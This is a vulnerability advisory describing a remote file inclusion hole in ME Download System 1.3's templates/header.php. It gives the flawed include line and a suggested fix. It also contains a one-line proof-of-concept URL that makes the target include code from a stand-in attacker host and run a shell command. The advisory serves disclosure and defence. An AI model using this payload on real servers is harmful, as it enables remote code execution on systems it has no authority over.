+--------------------------------------------------------------------
+
+ ME Download System 1.3 Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: ME Download System 1.3
+ Venedor ...........: http://www.ehmig.net/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_282.htm
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de http://www.bb-pcsecurity.de
+ Affected Files ....: templates/header.php
+
+--------------------------------------------------------------------
+
+ Code of /templates/header.php:
+
+ .....
+ <?php
+ include($Vb8878b936c2bd8ae0cab.'/settings_style.php');
+ .....
+
+--------------------------------------------------------------------
+
+ $Vb8878b936c2bd8ae0cab is not properly sanitized before being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Include config-File in header.php:
+
+--------------------------------------------------------------------
+
+ PoC:
+ http://[target]/templates/header.php?$Vb8878b936c2bd8ae0cab=http://evils
ite.com?cmd=ls
+
+--------------------------------------------------------------------
+
+ Notice:
+ Maybe there are more RFI-Vulns in other files, but it's very hard
+ to read this code.
+
+ Venedor has been contacted, but I didn't received any answer.
+
+--------------------------------------------------------------------
+
+ Greets:
+ Krini Gonzales
+
+-------------------------[ E O F ]----------------------------------
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum